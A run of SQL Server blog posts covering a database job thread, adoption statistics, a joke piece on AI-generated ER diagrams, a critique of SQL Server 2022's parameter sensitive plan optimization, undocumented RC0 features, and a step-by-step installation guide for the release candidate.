Is your company hiring for a database position as of September 2022? Do you wanna work with the kinds of people who read this blog? Let’s set up some rapid networking here. If your company is hiring, leave a comment.

The rules:

  • Your comment must include the job title, and either a link to the full job description, or the text of it. It doesn’t have to be a SQL Server DBA job, but it does have to be related to databases. (We get a pretty broad readership here – it can be any database.)
  • An email address to send resumes to, or a link to the application process – if I were you, I’d use an email address, so you know which applicants are readers here; they might be more qualified than the applicants you normally get.
  • Please state the location and include REMOTE and/or VISA when that sort of candidate is welcome. When remote work is not an option, include ONSITE.
  • Please only post if you personally are part of the hiring company—no recruiting firms or job boards. Only one post per company. If it isn’t a household name, please explain what your company does.
  • Commenters: please don’t reply to job posts to complain about something. It’s off topic here.
  • Readers: please only email if you are personally interested in the job.

If your comment isn’t relevant or smells fishy, I’ll delete it. If you have questions about why your comment got deleted, or how to maximize the effectiveness of your comment, contact me.

Each month, I publish a new post in the Who’s Hiring category here so y’all can get the latest opportunities.


[Video] Fragmentation Explained in 20 Minutes at SQLBits

Index Maintenance, Videos
17 Comments

What does fragmentation mean? How does it happen? Can you fix it with fill factor? Should you rebuild your indexes to fix it?

At the SQLBits conference, I tried a new way of explaining it using markers and pieces of whiteboard paper as database pages, and doing inserts live on the fly.

What you see onscreen is actually what the in-person audience saw up on the projector. Prior to the session, I rigged up a tripod and camera aimed down at the desk so the audience could watch me work.

I had so much fun with this session, and I’m so proud of the results. I want to thank SQLBits for recording the sessions and making them freely available on YouTube, and the sponsors for making it possible!


SQL ConstantCare® Population Report: Summer 2022

Ever wonder how fast people are adopting new versions of SQL Server, or what’s “normal” out there for SQL Server adoption rates, hardware sizes, or numbers of databases? Let’s find out in the summer 2022 version of our SQL ConstantCare® population report.

Out of the 3,151 servers sending in data recently, the most popular version of SQL Server is still 2016:

This will be the last version of the report where I’ll break out 2008, 2008 R2, and 2012 separately. Going forward, I’ll just lump ’em under “2012 & Prior” since they’ll add up to even less the next time I do the report.

Mainstream support is over for SQL Server 2014 & 2016, so here’s a number that makes me a little nervous: only 55% of servers are under mainstream support. When SQL Server 2017’s mainstream support ends in October 2022, that means only the 23% of users on SQL Server 2019, and the 13% in Azure SQL DB, will be getting regular updates. Yowza.

SQL Server 2016, 2017, and 2019 account for 69% of the user population.

Up in the cloud, Azure SQL DB jumped dramatically from 1% overall to about 13%, with 11% of that being Azure SQL DB itself, and Managed Instances at 2% of the population.

The newer products are at the top of this chart, and the new data’s at the right, so you can see the new stuff gradually pushing down the old stuff over time:

While the most popular version is still SQL Server 2016, this year 2019 is getting a lot closer. Every single version’s going down except SQL Server 2019 and Azure SQL DB.

These numbers help to give me perspective when I think about new adoptions of SQL Server 2022. It’s possible that SQL Server 2022 will gain adoption faster than 2019 did because I don’t think there were a whole lot of “I absolutely gotta have that” features in 2019. With 2022’s Availability Groups being able to fail back & forth to the cloud, if that ships in a solid, reliable, easy-to-troubleshoot way, that could be the killer feature that really spurs 2022 adoption.


Drawing Entity Relationship Diagrams with Stable Diffusion

Humor
3 Comments

Documenting your database and code is such a pain in the rear. Wouldn’t it be awesome if artificial intelligence could help?

Good news! There are a bunch of AI systems like Stable Diffusion and DALL-E that will draw things based on your text prompts. Forget the slow, tedious task of sketching out the relationships between your tables, and let the machines do the hard work for you.

For example, give this prompt to Stable Diffusion: entity relationship diagram, database, microsoft, sql server, table, unreal engine, ultra realistic

In the interest of speed, I’m only generating 512×512 pixel images, but… I tell you what, if I wanted to pull a joke on a project manager, it’d be pretty funny to generate a whole folder of high-resolution ones, print them out, and gesture at them as I quickly flip through the pages, saying, “We’ve done a spectacular amount of work documenting our database, the application, and its process flows.”

That’s all well and good, but … I think we can do better.

Thomas Kinkade’s Database Diagrams

Why not turn our database diagrams into something our parents would be proud to frame and hang on their walls? I mean, the Painter of Light is not my thing, but he brings a certain something to our databases.

prompt: entity relationship diagram!!!, database, art by thomas kinkade

He really brings our documentation to life. Our databases and apps are often a lot like trees – insert dead wood joke here, ha ha ho ho.

What if your style is a little more tech modern? I got you, fam.

Anime Database Diagrams

prompt: entity relationship diagram!!, database, art by greg rutkowski and wlop and artgerm

Right? RIGHT?!? That is bad ass. Now THAT is the kind of database documentation I actually wanna read. I want that on a poster in my office. I want that as a poster in my BEDROOM.

But sometimes, you’re working with an application that’s a little more… creative.

Salvador Dali’s Database Diagrams

Ever wonder how the surrealist painter would diagram out the relationships between his tables? Me too. I think about it all the time. It’s time to answer that vital question.

Prompt I used: entity relationship diagram, database, salvador dali, surreal

   

I hereby call on ERStudio to add a Salvador Dali filter. This is what the world needs today.

Too much for you? Want to ease things up a little?

Super Mario’s Entity Relationship Diagrams

I used a variety of prompts for these – it took a lot of experimentation because Stable Diffusion kept trying to just show Mario on top of diagrams, which wasn’t really what I wanted:

I think… that last one is a representation of Super Mario as … a database architect? That’s wonderful, and it sent me down another rabbit hole:

Prompt: super mario holding an entity relationship diagram printout in his hand

This is a wonderful fantasy world – however, let’s get back to today. Let’s find out more about the kinds of folks who have to work with this documentation.

Database administrator at work

Prompt I used: database administrator at work in the office, unreal engine, ultra realistic

 

Oof: welcome to biased artificial intelligence. If the model is trained on images and data that are mostly white males, and if you’re not specific about the subject of the art, then guess what kind of output you’re going to get? All white males with facial hair.

If you specifically *ask* for diversity, you can get it, but it’s up to you to do that. For example, if you prefix that prompt with “minority female”, then you get:

But again, if you want more diversity than that, you have to be more specific and ask for things like specific races. <sigh> Bias in artificial intelligence is a big issue, something scientists will be working on for the years to come. I just feel like I can’t talk about AI-generated images without at least mentioning that topic.

How to generate images yourself

Database administrator?

There are a bunch of cloud-based AI illustration tools like DALL-E, but most of them cost money or limit you to a certain number of attempts per day. I say “attempts” because a lot of times, when you put in a prompt, you’re not going to get an image you’re happy with. For example, if you just prompt “database administrator”, you get racks of servers in a data center.

It’s going to take a lot of attempts to get the kind of output you’re looking for. Therefore, I wanted to run it locally on my own laptop to get unlimited attempts with quick turnarounds.

Here’s what I used:

  • NVidia graphics card with at least 6GB of video RAM – I’m using my gaming laptop, an Asus Zephyrus with an RTX 3060 with 6GB of video RAM. 512×512 pixel images generate in about 20 seconds.
  • Stable Diffusion GRisk GUI 0.1 – free Windows app based on the open source Stable Diffusion, but requires no knowledge of how any of this stuff works. It just works, out of the box. 3GB download, requires about 7GB of drive space. Danger: this GUI is a closed-source app from a stranger, with no verifiable way to reproduce it, which means it could be doing anything, like installing malware or mining Bitcoin. If you’re willing to roll up your sleeves, there are safer but more complex ways to run it.
  • Stable Diffusion prompting cheatsheet – if you just put in “database administrator”, you get garbage. You need to be as descriptive as possible, and that’s where prompt engineering comes in. For many more details, check out the Stable Diffusion Akashic Records.
  • Lexica.art – examples of generated art, AND – here’s the important part – the prompts that created them. (The prompts are on the left – that’s not immediately obvious.)
  • /r/StableDiffusion – extremely active SubReddit.

I played around with Stable Diffusion a lot this weekend, and it’s incredibly addictive. The biggest problem by far is that you’re going to have an idea, put that prompt in, and say to yourself, “Well, that’s interesting… but if I just change a few keywords, I can make it way better.” And then next thing you know, an hour has gone by.

Here’s how my workflow goes:

  • Start with a set of keywords, and generate a bunch of images (like say 10 or 50.)
  • Find the ones you like, and note their seed numbers. Normally, Stable Diffusion takes -1 as a seed, which means generate a random seed. However, if you pass a specific seed number in again, but tweak your keywords the second time around, you can modify that image. For example, you can change the art style, or refine the keywords to make that image better represent what you’re looking for.

Happy playing! Did I say playing? I meant documenting. Yeah. You’re doing important research.


PSPO: How SQL Server 2022 Tries to Fix Parameter Sniffing

Parameter sniffing is a notorious problem for Microsoft SQL Server because it tries to reuse execution plans, which doesn’t work out well for widely varying parameters. Here’s a primer for the basics about how it happens.

SQL Server 2022 introduces a new feature called Parameter Sensitive Plan optimization. I’m not really sure why Microsoft capitalized the first three letters sometimes and not others, or why they only abbreviate it as “PSP optimization” – as long as we’re abbreviating, why not call it PSPO? Optimization is the word in there with the most syllables – why the hell would we leave that one as the one that isn’t abbreviated?

Because I make things go faster for a living, we’re gonna call it PSPO. You’ll see how I pronounce it later, and why.

We’ll pick up from that primer blog post, but this time around we’ll put the database in SQL Server 2022 compatibility mode, which enables PSPO.
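Assuming the same Stack Overflow demo database from the primer post, that's one command:

```sql
-- Compatibility level is a per-database setting:
ALTER DATABASE StackOverflow SET COMPATIBILITY_LEVEL = 160;  -- SQL Server 2022
```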

When I run it for @Reputation = 2, hardly any users match:

The actual execution plan has some new stuff in SQL Server 2022:

Up near the top of that screenshot, if you look closely at the query, the query itself has been modified. SQL Server has added an “option” hint. Here’s the full text of the modified query:
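I won't reproduce the screenshot text exactly here, but the appended hint is shaped roughly like this – the variant ID, the fully qualified column name, and the row-count boundaries all come from SQL Server, so treat this as a paraphrase rather than verbatim output:

```sql
SELECT *
FROM dbo.Users
WHERE Reputation = @Reputation
OPTION (PLAN PER VALUE(QueryVariantID = 2,
    predicate_range([StackOverflow].[dbo].[Users].[Reputation] = @Reputation,
        100.0, 1000000.0)));
```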

Let’s dig into how this works.

What the “plan per value” option means

When SQL Server compiled the query plan for the first time, it noticed that we were doing an equality search on the Users.Reputation column, and noticed that different parameters for that value might produce dramatically different numbers of rows. That explains the “predicate_range” part.

SQL Server realized:

  • Some parameters might produce fewer than 100 rows
  • Some might produce 100 to 1,000,000 rows
  • Some might produce over 1,000,000 rows

So SQL Server will build a small, medium, and large query plan for this one query, using different plans depending on the parameter that gets passed in. That’s pretty spiffy because the plan isn’t hard-coding specific parameter values – instead, each time the plan gets executed, SQL Server will look up that parameter in the statistics histogram and choose the small, medium, or large plan based on the value it guesses from the histogram.

To see what goes into the plan cache, let’s clear the cache, run the query, and then check the plan cache’s contents with sp_BlitzCache:
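The demo steps look like this, with a hypothetical proc name standing in for the one from the primer post (and please, don't free the cache on a production server):

```sql
DBCC FREEPROCCACHE;    -- clear the plan cache (dev/test only!)

EXEC dbo.usp_UsersByReputation @Reputation = 2;

EXEC dbo.sp_BlitzCache;    -- from the free First Responder Kit
```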

sp_BlitzCache shows that the outer stored procedure has been executed one time, and the inner statement has been executed once:

That’s kinda slick because it means SQL Server only put the medium-sized plan into cache. It didn’t build the small or large plan because it didn’t need to yet – those haven’t been executed yet, and they might never be executed.

Let’s execute the large data version, Reputation = 1. That produces a ton of rows because everybody gets 1 point when they first open their account:

The actual plan is a parallel table scan:

And SQL Server rewrote the query text to include a different QueryVariantID:

And the plan cache shows that the outer proc has been executed twice, with both the medium and large query being executed once each:

If you only read this far, and only do a short demo like that, it seems like Microsoft made huge leaps in solving the parameter sniffing issue. PSPO enables us to cache up to 3 execution plans per query – a small, medium, and large plan – and chooses between them at runtime. That’s how it’s going to look from conference stages as Microsoft brags about the effectiveness of this feature.

But let’s dig just a little bit deeper, and there are small, medium, and large problems.

Small problem: we still have sniffing.

Try running it for, say, Reputation = 3 and review the actual query plan:

Reputation = 3 reuses the query plan we built for Reputation = 2 – scroll up to the earlier screenshots if you wanna double-check my work. Note that SQL Server only estimated that it’d find 9,149 rows – that’s because the medium plan sniffed the first value it was called with, Reputation = 2.

Reputation = 3 brings back 21x more rows than Reputation = 2 did, so it reads more logical pages than there are in the table, only goes single-threaded, and the sort spills to TempDB.

If we free the plan cache, and then run it for Reputation = 3 first:

Then the “medium” plan is a parallel scan with a big memory grant, which works beautifully for Reputation = 3. However, it doesn’t work as well for Reputation = 2:

Which leaves that giant memory grant on the floor and generates a ton of CX% waits because the estimate is now 21x off in the other direction.

SQL Server 2022’s PSPO implementation doesn’t fix parameter sniffing – it amplifies the problem, because now we have more possible execution plans in memory, each of which gets sniffed. In most scenarios, I think this is still going to be a net win, because the small and large plans will likely be way less vulnerable to extreme performance emergencies. The medium plans will still be just as vulnerable.

Medium problem: direct equality searches only.

The PSPO implementation is more of a down payment than a full payment. It only works for equality searches, not range searches. One of the most common parameter sniffing problems is the date range issue: queries with start & end date parameters, like this.
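That pattern looks something like this (proc and column names are illustrative):

```sql
CREATE OR ALTER PROCEDURE dbo.usp_UsersByCreationDate
    @StartDate datetime,
    @EndDate   datetime
AS
BEGIN
    -- Range predicate, not an equality search: PSPO ignores it.
    SELECT *
    FROM dbo.Users
    WHERE CreationDate >= @StartDate
      AND CreationDate <  @EndDate;
END;
```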

PSPO doesn’t add the option hint to the query here:

Because PSPO is coded for direct equality searches only.

By direct, I mean direct comparisons to a column with known huge variances in cardinality. For an example of an indirect search, let’s take a table that has a lookup table: the Posts and PostTypes tables. Stack Overflow stores all kinds of things in the Posts table, and they’re identified by their PostTypeId:

Questions and Answers are by far the most popular PostTypes:

So given that I’ve got an index on PostTypeId, which means we also have statistics on PostTypeId, this query could get different plans for different parameters:
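The query in question is shaped like this – a paraphrase of the demo, with the equality on the lookup table’s name column rather than directly on Posts.PostTypeId:

```sql
SELECT p.*
FROM dbo.Posts p
INNER JOIN dbo.PostTypes pt
    ON p.PostTypeId = pt.Id
WHERE pt.Type = @TypeName;    -- e.g. 'PrivilegeWiki'
```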

Sadly, it does not, because PSPO doesn’t trigger here either – note that PSPO didn’t add an option hint on the query:

Note the wiiiiildly incorrect estimates on the number of Posts that will match. SQL Server’s using the density vector there, optimizing for the average PostTypeId rather than any specific one. PSPO won’t go so far as to:

  1. Fetch the PostTypeId for ‘PrivilegeWiki’, then
  2. Look up that PostTypeId in the statistics on the Posts table, then
  3. Notice that there’s a large skew by PostTypeId, and build different plans

Nope – that’s too much work for the PSPO implementation, at least in v2022.

Large problem: monitoring software is doomed.

If you look closely at the sp_BlitzCache screenshots, there’s a huge, massive, giant, unbelievably big new problem:

In the “Query Type” column, the two PSPO-generated queries just say “Statement.” When you’re looking at queries and plans – whether you’re looking at the plan cache, or sp_WhoIsActive, or your monitoring tools, or Query Store as Erik Darling demos – SQL Server can no longer tell where the query came from. It’s like every running statement is suddenly dynamic SQL with no parent.

For example, if you look at the query plan for a stored procedure that’s been “optimized” by PSPO, you get:

If you think that’s bad, there’s no way to join to the underlying statements. That’s not just bad, it’s poor. Really, really poor.

Going into SQL Server 2022 compatibility level simply breaks query performance monitoring.

And it looks bad even in shades.
I call ’em like I see ’em.

When the first previews of 2022 dropped, I played around with this feature and thought, “There is absolutely no way they’d ship something this broken.” I just kinda shrugged and moved on. But now, today, it’s heartbreaking to think this is the way the feature’s going to ship.

That’s PSPO.

Pronounced pss-poh, as in piss-poor.

I love the idea of parameter-sensitive plan optimization. It’s a great idea. Done correctly, this would make database apps go faster and reduce the troubleshooting involved when they’re having performance issues.

But this, this is just a PSPO implementation.


What’s New in SQL Server 2022 Release Candidate 0: Undocumented Stuff

SQL Server 2022
24 Comments

Microsoft has an official list of what’s new in 2022 overall, but here I’m specifically focusing on system objects that might be interesting to script developers like you and me, dear reader.

New stored procedure sp_get_table_card_est_and_avg_col_len – I assume the “card” refers to statistics and cardinality, not Hallmark. SQL Server has historically struggled with memory grants because it uses datatype size to budget memory grants, and bigger-than-necessary data types (like NVARCHAR(MAX)) have led to larger-than-necessary grants. It’d be cool if this proc was a down payment to mitigate that problem, but I have a sinking feeling it has to do with external data sources. I would tell you more about it, but when I run it, I get:

New view sys.dm_tran_orphaned_distributed_transactions – every now and then, I’ve run across Availability Groups replicas with problems due to orphaned distributed transactions consuming DTC resources or holding locks. This new undocumented DMV might be a down payment to resolve that problem. I don’t have an easy way to reproduce the problem quickly, so I can’t demo it.

New view sys.database_automatic_tuning_configurations – this one’s a little odd because Books Online tells me it’s been around since SQL Server 2017, but I don’t remember seeing it before, and it’s not in my 2019 test instances. Tells you if Force_Last_Good_Plan is on, and I would imagine that as more automatic tuning options come out over the next several releases, this view might gain more info.

New Query Store DMV columns – now that Query Store is starting to work on read-only replicas, it looks like they added plan_persist_plan_feedback.replica_group_id and plan_persist_query_hints.replica_group_id to support those goals. Plus, plan_persist_plan_forcing_locations gets columns for timestamp and plan_forcing_flags.

New spinlock troubleshooting – sys.dm_os_workers gets columns for spinlock_wait_time_ms, spinlock_max_wait_time_ms, and spinlock_wait_count.

New stuff to support offloaded compression

This stuff needs its own section. RC0 introduced the ability to offload compression to Intel processors equipped with QuickAssist.

We get new sp_configure options for ‘hardware offload mode’ and ‘backup compression algorithm’. By default, these are off. To turn on offloaded compression, install the Intel QAT drivers, then do an alter:
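Here's a hedged sketch of those commands, using the option names mentioned above – this is pre-release territory, so verify the exact names against the docs for your build before running anything:

```sql
EXEC sp_configure 'show advanced options', 1;
RECONFIGURE;

EXEC sp_configure 'hardware offload mode', 1;
RECONFIGURE;

-- Then point SQL Server at the QAT accelerator:
ALTER SERVER CONFIGURATION SET HARDWARE_OFFLOAD = ON (ACCELERATOR = QAT);
```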

Which returns:

After restarting the SQL Server, check this brand spankin’ new DMV:
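If I'm reading the RC0 bits right, that's sys.dm_server_accelerator_status:

```sql
SELECT *
FROM sys.dm_server_accelerator_status;
```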

And, uh, on my VM, it’s still not enabled:

Because you can enable it even on processors that don’t support it, which strikes me as kinda odd. I suppose you would want to make it part of your standard build, and then whenever it’s available, it’ll get used, assuming you call for offloaded backup compression in the right way.

New messages in RC0

In each release, I check sys.messages for new stuff. Some of this stuff gets added for the cloud, like Azure SQL DB or Managed Instances, so take these with a grain of salt. Here’s what’s new in RC0 since the last CTP:

  • 1136: The tempdb has reached its storage service limit. The storage usage of the tempdb on the current tier cannot exceed (%d) MBs.
  • 5373: All the input parameters should be of the same type. Supported types are tinyint, smallint, int, bigint, decimal and numeric.
  • 5374: WITH clause is not supported for locations with ‘%ls’ connector when specified FORMAT is ‘%ls’.
  • 16722: Cannot change service objective for %ls to %ls as long-term retention is not supported yet on Hyperscale. Please disable long-term retention on the database and retry
  • 17414: Retrieving the address of an exported function %.*ls in accelerator library %.*ls failed with error 0x%x.
  • 17415: %.*ls component enumeration failed with zero component count.
  • 17416: %.*ls component enumeration failed with mismatch in component count.
  • 17417: %.*ls %.*ls not compatible with SQL Server.
  • 17418: Detected %.*ls %.*ls.
  • 17419: %.*ls hardware detected on the system.
  • 17420: %.*ls hardware not found on the system.
  • 17431: %.*ls initialization failed with error %d.
  • 17432: %.*ls initialization succeeded.
  • 17433: %.*ls session creation failed with error %d.
  • 17434: %.*ls session sucessfully created.
  • 17435: %.*ls will be used in hardware mode.
  • 17436: This edition of SQL Server supports only software mode. %.*ls will be used in software mode.
  • 17437: %.*ls will be used in software mode.
  • 17438: %.*ls session alive check failed with error %d.
  • 17439: %.*ls session tear down failed with error %d.
  • 17440: %.*ls session close failed with error %d.
  • 17441: This operation requires %.*ls libraries to be loaded.
  • 19713: Statistics on virtual column are not avalable.
  • 19714: Number of columns in PARTITION clause does not match number of partition columns in Delta schema.
  • 21093: Only members of the sysadmin fixed server role or db_owner fixed database role or user with control db permission can perform this operation. Contact an administrator with sufficient permissions to perform this operation.
  • 22786: Synapse workspace FQDN is not in the list of Outbound Firewall Rules on the server. Please add this to the list of Outbound Firewall Rules on your server and retry the operation.
  • 22787: Change feed table group limit of %d groups exceeded
  • 22788: Could not enable Change Feed for database ‘%s’. Change Feed can not be enabled on a DB with delayed durability set.
  • 25755: Could not create live session target because live session targets are disabled.
  • 31633: The length of the provided %ls exceeds the maximum allowed length of %u bytes.
  • 31634: The %ls must contain a ‘%ls’ for use with managed identity.
  • 31635: The %ls’s ‘%ls’ value must be a %ls for use with managed identity.
  • 31636: Error retrieving the managed identity access token for the resource id ‘%ls’
  • 33547: Enclave comparator cache failed to initialize during enclave load.
  • 39057: The value provided for the ‘%.*ls’ parameter is too large.
  • 39058: The parameter ‘%.*ls’ has a type that is not supported.
  • 45770: Failed to move the database into elastic pool due to internal resource constraints. This may be a transient condition, please retry.
  • 46552: Writing into an external table is disabled. See ‘https://go.microsoft.com/fwlink/?linkid=2201073’ for more information.
  • 46553: Create External Table as Select is disabled. See sp_configure ‘allow polybase export’ option to enable.
  • 46953: Pass through authorization using S3 temporary credentials is not supported. Please use S3 credentials to access storage.
  • 47507: Adding memory optimized files to the database replicated to Azure SQL Managed Instance is not supported because its service tier does not support In-memory OLTP capabilities. Consider replicating database to managed instance service tier supporting In-memory OLTP capabilities.
  • 47508: Adding multiple log files to the database replicated to Azure SQL Managed Instance is not supported because managed instance does not support multiple log files.
  • 47509: Adding FileStream or FileTables to the database replicated to Azure SQL Managed Instance is not supported because managed instance does not support FileStream or FileTables.
  • 47510: Adding multiple memory optimized files to the database replicated to Azure SQL Managed Instance is not supported because managed instance does not support multiple memory optimized files.

If any of those messages are interesting to you, feel free to leave a comment about it.

New database-scoped configuration options

These are all new since SQL Server 2019 – some were introduced in prior CTPs, but I’m mentioning them all here because there’s good stuff in here for query tuners:

  • 25 – PAUSED_RESUMABLE_INDEX_ABORT_DURATION_MINUTES
  • 26 – DW_COMPATIBILITY_LEVEL
  • 27 – EXEC_QUERY_STATS_FOR_SCALAR_FUNCTIONS
  • 28 – PARAMETER_SENSITIVE_PLAN_OPTIMIZATION
  • 29 – ASYNC_STATS_UPDATE_WAIT_AT_LOW_PRIORITY
  • 31 – CE_FEEDBACK
  • 33 – MEMORY_GRANT_FEEDBACK_PERSISTENCE
  • 34 – MEMORY_GRANT_FEEDBACK_PERCENTILE_GRANT
  • 35 – OPTIMIZED_PLAN_FORCING
  • 37 – DOP_FEEDBACK
  • 38 – LEDGER_DIGEST_STORAGE_ENDPOINT
  • 39 – FORCE_SHOWPLAN_RUNTIME_PARAMETER_COLLECTION

That last one’s particularly interesting to me because SQL Server 2019 originally shipped in a way that you could see runtime parameters in sys.dm_exec_query_statistics_xml, and then they turned it off around CU11-12 without documenting the changed behavior. That was a total bummer, because that feature was a lifesaver for troubleshooting parameter sniffing. I’m hoping we can get that back again.
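If it does come back, the per-database switch would presumably look like this – hedged, since I haven't confirmed the behavior in RC0:

```sql
ALTER DATABASE SCOPED CONFIGURATION
    SET FORCE_SHOWPLAN_RUNTIME_PARAMETER_COLLECTION = ON;
```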


How to Install SQL Server 2022 Release Candidate 0

SQL Server 2022
0 Comments

SQL Server 2014’s end of support date is coming in less than two years: July 9, 2024. I know that sounds far-off right now, but consider the work you have to do between now and then:

  • Pick a new version to migrate to
  • Set up development SQL Servers for that new version
  • Start developing & testing with it
  • Get users to sign off that it’s working as expected
  • Design your high availability & disaster recovery strategies for it (something I recommend folks revisit with each new release)
  • Set up production/HA/DR SQL Servers
  • Migrate over to the new servers

With that in mind, if you’re still running SQL Server 2014 today in production, now is the time to start moving your development servers over to the newer SQL Server version. I’ve got a post on which SQL Server version you should use, but if you’re just now starting a 2014 replacement plan, then you’re the kind of shop that doesn’t upgrade very often. (Which is cool! Change = risk.) In that case, I’d think about using SQL Server 2022 to get the longest lifespan you can out of your SQL Servers.

The first release candidate for Microsoft SQL Server 2022 is out, so let’s see what’s involved with installing it.

Start with a fresh, empty Windows VM for testing. Never install test/evaluation bits on your laptop or an existing SQL Server – it’s a recipe for trouble. Pre-release bits (and even release bits!) can cause side-by-side existence problems that you don’t want to have to waste time troubleshooting.

When the Windows VM is ready, download the installer here. When you run it, the Installation Center opens:

SQL Server Installation Center

Click the Installation tab at left:

And for a standalone evaluation/development server, click the first line for a new standalone installation. (Most of the rest are just hyperlinks to go download other things that aren’t included in the SQL Server installer.)

The installer launches, and it’s time to choose your character:

Your choices:

  • Evaluation Edition – just like Enterprise, but it times out after 180 days.
  • Developer Edition – just like Enterprise, no time bomb, but isn’t allowed to be used for production purposes. Frankly, you’d be asking for trouble using Evaluation Edition for production purposes too, since it has that time bomb. You wanna choose Developer because your evaluation period is probably going to extend beyond 180 days, and you don’t wanna have to worry about time bombs.
  • Express Edition – only for tiny databases.

Choose your character – I’m going with Developer – and then hit Next.

Let’s not pretend you’re going to read that, but I’ll point out one amusing section:

The $5 limit is because starting with SQL Server 2022, Microsoft is using Fiverr for development, testing, and support. The most they can get back from Fiverr for a refund is the $5 they spent on the contractor, so they gotta cap their losses. Otherwise, they’d go bankrupt from KB4538581 alone.

Accept the terms, hit Next, and the installer runs some basic validation checks to make sure the VM is in a good state:

In my case, the Windows Firewall warning is because Windows Firewall is enabled. If you click the Warning link, you’ll get instructions to set up an exclusion rule to let SQL Server traffic pass through the firewall. If you plan to test apps hitting this server, make a note that you’ll need to change the Windows Firewall settings – but you can ignore this during setup and circle back to it later.

When you hit Next, you get the first new screen:

As strange as it may seem, Microsoft is on a mission to get even more money out of you than just the SQL Server licensing costs. They want you to pay ongoing fees to use Azure services to manage your SQL Servers, regardless of where they live. If you want to burn money, buy candles.

Me personally, I can’t afford that and it’s irrelevant to my testing, so I’m going to uncheck that and click Next. Now, it’s time to pick features.

Install as few features as practical. Every box you check here has a performance cost. Many of them will consume CPU and memory even when they’re not being actively used.

The Features list in that screenshot looks like it’s cut off, like there’s more stuff below “Redistributable Features”. In RC0, there’s nothing else to see – there’s nothing below that. It’s a bug. What, you thought the product was ready? Buckle up, bud – it’s the first of many.

In that feature list, the only thing I’m going to check is Database Engine Services. I’m not a fan of SQL Server’s full text search, although I understand why people use it. Wanna check any other box on a production SQL Server? You should pause for a moment and reconsider the life choices that brought you here. Wanna check them just because it’s a dev box? Bad idea: if you make something available in development, then developers will come to rely on it, and then they’ll build code atop it, and need it in production. In terms of features, treat your dev servers like production.

After checking the Database Engine Services box, the Instance Root Directory option will light up:

You can leave that one on the C drive – that’s fine. We’ll set the data & backup locations in subsequent steps. Click Next.

You can install multiple instances of SQL Server on the same Windows VM. I’m actually going to choose Named Instance because I need this for something else I’m doing, but you should leave it on Default.

When you click Next, there will be a significant pause before the next screen appears:

If you’re installing just for the purposes of testing 2022, you can stick with these service account names. Check the box for Grant Perform Volume Maintenance Tasks – that’s Instant File Initialization, which helps restore databases much more quickly. That’s important when you’re doing testing on new versions.
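Once the instance is up, you can double-check that Instant File Initialization actually took effect. A quick sanity check, assuming SQL Server 2016 SP1 or later (where this column exists):

```sql
-- 'Y' means Instant File Initialization is enabled for the engine service:
SELECT servicename, instant_file_initialization_enabled
FROM sys.dm_server_services
WHERE servicename LIKE 'SQL Server (%';
```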

If your application needs case sensitivity or a different collation, click the Collation tab:

If you’re testing to replace an existing server, connect to that server with SQL Server Management Studio. Right-click on the server name, click Properties, and the existing server’s collation will be listed on the properties screen:

Back on your SQL Server 2022 setup, choose the collation that matches your existing production server, and click Next.
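If you’d rather not click through Properties screens, the same answer is one query away on the existing production server:

```sql
-- Run this on the server you're replacing to get its collation:
SELECT SERVERPROPERTY('Collation') AS ServerCollation;
```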

On the Server Configuration tab, the first decision you have to make is whether to allow SQL authentication. Over time, trends have gone back & forth as to whether this was a good idea. We were trying to stamp it out for a while, but then Azure SQL DB came out and it didn’t support Windows auth, so Microsoft had to backtrack on the idea that SQL authentication was bad. These days, Azure SQL DB supports Windows auth (although it’s often a pain in the rear), so “experts” are all over the place as to whether or not you should have it on.

Most of the apps I interact with require it, so I’m going to set Mixed Mode, and then set a strong password for the SA account.

You have to take action in the “Specify SQL Server administrators” box. If you don’t, nobody’s going to be an admin on the instance, and you’re going to be in a world of hurt when you go to actually use this server. At bare minimum, add yourself by clicking the “Add Current User” button, which will take a few seconds. For real production purposes, you’ll want to use an Active Directory group consisting of database administrators.
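If you skip the Active Directory group during setup, you can add it after the fact with T-SQL. The domain and group names here are made up – swap in your own:

```sql
-- Grant your DBA team's AD group sysadmin rights on the new instance:
CREATE LOGIN [YOURDOMAIN\SQL_DBAs] FROM WINDOWS;
ALTER SERVER ROLE sysadmin ADD MEMBER [YOURDOMAIN\SQL_DBAs];
```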

Click the Data Directories tab, and you’ve got some work to do:

You have to take action here too. If you leave the “Data root directory” set to the OS boot drive, then sooner or later someone’s going to create or restore a database, pour a lot of data into it, and run the OS boot drive out of space. Choose a different volume for the database files to live on.

I’m using a server with a Z drive, so after I type in “Z:\” in that top box and hit Tab, here’s what my screen looks like:

For my purposes, that’s fine. Click the TempDB tab:

If you have standard file sizes that you use, feel free to change those. For me, an 8MB initial file size and 64MB autogrowth are awfully small. Even on dev/test servers, I go with 1024MB initial and autogrowth sizes for both data and log files, like this:
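If you forget to set these during setup, the same change can be made afterward. A sketch for one data file and the log file, assuming the default logical file names (tempdev, templog):

```sql
-- Resize tempdb files to 1024MB initial size with 1024MB autogrowth:
ALTER DATABASE tempdb
    MODIFY FILE (NAME = tempdev, SIZE = 1024MB, FILEGROWTH = 1024MB);
ALTER DATABASE tempdb
    MODIFY FILE (NAME = templog, SIZE = 1024MB, FILEGROWTH = 1024MB);
```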

Then click the MaxDOP tab:

SQL Server’s gotten a lot better over the last couple of releases at setting the right Maximum Degree of Parallelism (MaxDOP or MAXDOP, depending on where in that screenshot you look – consistency is the hobgoblin of little minds), so the installer’s suggested default is fine for a test box.

Click the Memory tab:

Click the Recommended radio button, or else SQL Server will drain your memory dry. Just as a side note, Max Server Memory doesn’t actually mean the maximum – there are things SQL Server will use memory for above and beyond that maximum. We’re just setting a ceiling to make sure things don’t go absolutely crazy.
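You can check or adjust this setting later without re-running setup. The 6000MB cap below is just an example for a small test VM, not a recommendation:

```sql
-- Max Server Memory is an advanced option, so expose those first:
EXEC sp_configure 'show advanced options', 1;
RECONFIGURE;

-- Then set the memory ceiling (in MB) - takes effect immediately:
EXEC sp_configure 'max server memory (MB)', 6000;
RECONFIGURE;
```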

Don’t click the FILESTREAM tab. I know it’s in all caps, which means Microsoft is yelling at you, imploring you to use SQL Server as a really expensive file server. It’s a bad idea. Save your lunch money, and put files where they belong.

Click Next, and decision time is over – just click Install:

After installation finishes, you can use SQL Server Management Studio to connect. You don’t have to download a new version – SSMS 19 isn’t required.
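Once connected, a quick sanity check confirms you’re on the build you think you are:

```sql
-- Verify the version and edition of the freshly installed instance:
SELECT @@VERSION AS VersionString,
       SERVERPROPERTY('ProductVersion') AS ProductVersion,
       SERVERPROPERTY('Edition') AS Edition;
```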


[Video] Office Hours: Ask Me Anything About SQL Server

Videos
0 Comments

Post your Microsoft data platform questions at https://pollgab.com/room/brento and upvote the ones you’d like to see me answer. I sat down by the pool in Cabo with a cup of coffee to go through ’em:

